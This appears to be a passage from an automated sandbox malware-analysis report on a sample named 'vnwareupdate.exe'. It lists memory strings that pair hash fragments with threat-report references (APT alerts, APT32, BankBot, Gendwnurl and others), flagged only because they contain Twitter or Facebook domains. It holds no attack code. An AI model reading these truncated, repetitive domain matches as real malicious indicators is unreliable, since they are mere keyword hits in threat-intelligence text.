Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 7AA521E7CAFB360294E56969EDA5D6;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 7DBFA8CBB39192FFE2A930FC5258D4C1;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 7EAE5684E4B4BF44E36F2810C86FCD33;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 8341E48A6B91750D99A8295C97FD55D5;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 848775BAB0801E5BB15B33FA4FCA573C;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 8775BAB0801E5BB15B33FA4FCA573C;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 88520F80C6CA3038445EBB3D6A51F3D90BF717;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 8943E71A8C73B5E343AA9D2E19002373;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 8A39BFE18D912DBCC940D05D692EFEB9;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 8A97B4E2F37F34B255F0643E49FC9D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 8F64E917FEBEA4AB178F7D21A7E220FE;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 8FF4DC8A2EBFD5EEA11A38877BD4F2DF;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 901FD9AEEACA9631902BCCD6BDD89F74;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 90514DEE65CAF923E829F1E0094D2585;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 905A3508D9309A93AD5C0EC26EBC9B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 9095C965A55EFC46E16B86F9B7D6C6;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: 9166A078FB409E1952164028A00B99;Gendwnurl Backdoor https://twitter.com/0x766c6164/status/794176576011309056 / https://www.microsoft equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 943F5E45BEFA52FB12748CA7171D30096E1D4FC3C365561497C618341299D5;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 9528E52A31D1D348ACB2077E2FC240;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 95DBE00A538DF127E0079294C87DA0;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 96489F3E5D8BFEB3A75250017191277E2D5D0BAE;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 97290300ABB68FB48480718E6318EE2CDD4F099AA6438010FB2F44803E0B58;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 99AA0D0ECEEFCE4C0856532181B449B1;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 9B97290300ABB68FB48480718E6318EE2CDD4F099AA6438010FB2F44803E0B58;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 9D1F5D79CD906F75C88177C7F6168E;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: 9F959F92210D8DD40710BA34548AE960864754;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A030EA830A12A32E84A012DFB1679B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A07AA521E7CAFB360294E56969EDA5D6;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A0B7FBDBDCEF1777657182A504283D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A11F3D68FD6CDEF04B6DF17BBE8F4D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A1A73253F04354886F375B59550B46;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A278256FBF2F061CFDED7FDD58FEDED6765FADE730374C508ADAD89282F67D77;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A28EFB6E32E653B656CA32CCD44B3111145A695F6F6161965DEEBBDC437076;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A54CCC770DCCE8FD4929B7C1176470;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A602B03555A505CFCFC4B5F4F716B2BA88ED4CD8;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A6D36749EEBBBC51B552E5803ED1FD58;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A8F69EB2CF9F30EA96961C86B4347282;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: A906082DF6383AA8D5DE60F6EF830E;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: AA0D0ECEEFCE4C0856532181B449B1;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: AA374B5A53E34E161C59D18CE6FDFF;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: AA905A3508D9309A93AD5C0EC26EBC9B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: ACDB6D5C1D8C3F5E3C29C3605BFFCF18;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: AE5684E4B4BF44E36F2810C86FCD33;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: APT32 and the Threat to Global Corporations https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlAPT32 and the Threat to Global Corporations https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlAPT32 and the Threat to Global Corporations https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlAPT32 and the Threat to Global Corporations https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlAPT32 and the Threat to Global Corporations https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlAPT32 and the Threat to Global Corporations https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.htmlPowerShell ransomware delivered in MalSpam https://myonlinesecurity.co.uk/new-powershell-ransomware-coming-in-malspam-emailPowerShell ransomware delivered in MalSpam https://myonlinesecurity.co.uk/new-powershell-ransomware-coming-in-malspam-emailPowerShell ransomware delivered in MalSpam https://myonlinesecurity.co.uk/new-powershell-ransomware-coming-in-malspam-emailSandworm to Blacken: The SCADA Connection http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-tSandworm to Blacken: The SCADA Connection http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-t9002 RAT -- a second building on the left http://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-9002 RAT -- a second building on the left http://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-Sandworm to Blacken: The SCADA Connection http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-tXData ransomware attacked users in Ukraine https://twitter.com/martin_u/status/880088927595638784 / https://nioguard.blogspXData ransomware attacked users in Ukraine https://twitter.com/martin_u/status/880088927595638784 / https://nioguard.blogsp equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: B12CCD0A2BFE7D9540E29FAB052698BB300E81326EFD8D85515069179F2FC0;Trojan.Klonzyrat https://twitter.com/jiriatvirlab/status/822601440317345792 / https://www.symante equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: B45D63D4D952E9A0715583F97A2D9EDEB45AE74E;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: B6CA04CC59805E2680D77A71D9D7BD2F;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: B72A2802D2A7FF33FD2D4BBCF41188724FCAA8;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: BA756DD64C1147515BA2298B6A760260;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: BCF823EEEE02967B49B764E22319C79F;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: BE0A15D1AA85C9D39C4757EFDA861DA014156D31;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: BEF7BDDAF50624E840CCBCE2816594;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: BFA54CCC770DCCE8FD4929B7C1176470;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: BFA8CBB39192FFE2A930FC5258D4C1;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: BankBot Found on Google Play and Targets Ten New UAE Banking Apps http://blog.trendmicro.com/trendlabs-security-intelligence/bankbot-found-google-BankBot Found on Google Play and Targets Ten New UAE Banking Apps http://blog.trendmicro.com/trendlabs-security-intelligence/bankbot-found-google-BankBot Found on Google Play and Targets Ten New UAE Banking Apps http://blog.trendmicro.com/trendlabs-security-intelligence/bankbot-found-google-BankBot Found on Google Play and Targets Ten New UAE Banking Apps http://blog.trendmicro.com/trendlabs-security-intelligence/bankbot-found-google-BankBot Found on Google Play and Targets Ten New UAE Banking Apps http://blog.trendmicro.com/trendlabs-security-intelligence/bankbot-found-google-New multi platform malware/adware spreading via Facebook Messenger https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-mNew multi platform malware/adware spreading via Facebook Messenger https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-mNew multi platform malware/adware spreading via Facebook Messenger https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-mLarge Malvertising Campaign Leads to Angler EK & Bunitu Malware http://community.websense.com/blogs/securitylabs/archive/2015/06/10/large-malverLarge Malvertising Campaign Leads to Angler EK & Bunitu Malware http://community.websense.com/blogs/securitylabs/archive/2015/06/10/large-malverLarge Malvertising Campaign Leads to Angler EK & Bunitu Malware http://community.websense.com/blogs/securitylabs/archive/2015/06/10/large-malverChina Hacks the Peace Palace: All Your EEZ\u2019s Are Belong to Us https://www.threatconnect.com/china-hacks-the-peace-palace-all-your-eezs-are-belChina Hacks the Peace Palace: All Your EEZ\u2019s Are Belong to Us https://www.threatconnect.com/china-hacks-the-peace-palace-all-your-eezs-are-bel equals www.facebook.com (Facebook)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: C093A79FAE9B92E69C99BB28F9AE12939E4E1327A371EEAC9207E346ECCDB4;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: C0D3A05CD0CEF8294506F37A0B8A00;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: C1529353E33FD3C0D2802BB558414F11;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: C1A030EA830A12A32E84A012DFB1679B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: C34CB67845A88F1A9C22CEAAD46F584B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: C3DC68E8D734968432C5DD5F6DB444C7;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: C8791BCEBAEA85E9129E706B22E3BDA43F762E4A;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: C909D2F625223DB2FB858BBDF42A76;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: CA04CC59805E2680D77A71D9D7BD2F;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: CC56C93C5BA1318DD2FA9C3509D60B;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: CDA0B7FBDBDCEF1777657182A504283D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: CEFB8A9866A1A09F8ADE2992575F489BCEB735;Trojan.Klonzyrat https://twitter.com/jiriatvirlab/status/822601440317345792 / https://www.symante equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: D36749EEBBBC51B552E5803ED1FD58;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: D3D8795559A556A8897EC6E003FC91;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: D745EA39C8C5B82D5E153D3313096C;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: D7D745EA39C8C5B82D5E153D3313096C;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: DB07E1740152E09610EA826655D27E8D;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: DB6D5C1D8C3F5E3C29C3605BFFCF18;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: DC68E8D734968432C5DD5F6DB444C7;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: DD5F334CFFD250A1E16DAC46165DD6;Gendwnurl Backdoor https://twitter.com/0x766c6164/status/794176576011309056 / https://www.microsoft equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: DDE2A6AC540643E2428976B778C43D39;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
